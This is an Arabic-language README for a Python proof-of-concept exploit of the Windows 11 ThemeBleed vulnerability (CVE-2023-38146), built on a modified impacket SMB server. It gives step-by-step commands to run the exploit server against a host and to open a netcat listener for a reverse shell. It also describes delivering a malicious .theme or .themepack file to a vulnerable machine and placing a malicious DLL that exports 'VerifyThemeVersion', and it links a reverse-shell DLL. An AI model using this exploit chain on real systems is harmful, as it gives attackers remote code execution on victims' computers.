
PoC لـ ThemeBleed في Windows 11 CVE-2023-38146 مكتوب بلغة بايثون باستخدام impacket. https://jnns.de/posts/cve-2023-38146-poc/
مستوحى بشكل كبير من https://github.com/gabe-k/themebleed الذي يعمل فقط على ويندوز (السبب الذي دفعني لكتابة هذا).
استخدمت كودًا معدلاً من impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
أشياء مفيدة: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
المقال: https://jnns.de/posts/cve-2023-38146-poc/
قم بتثبيت المتطلبات وتشغيل التطبيق:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
استخدم ملف "evil_theme.theme" أو "evil_theme.themepack" على جهاز ضعيف.
اربح!
ضع ملف DLL يحتوي على دالة مصدرة "VerifyThemeVersion" في مجلد "./td/" باسم "Aero.msstyles_vrf_evil.dll". يجب أن تكون قادرًا على العثور على مثال لملف DLL باستخدام جوجل أو استخدم مثالي https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711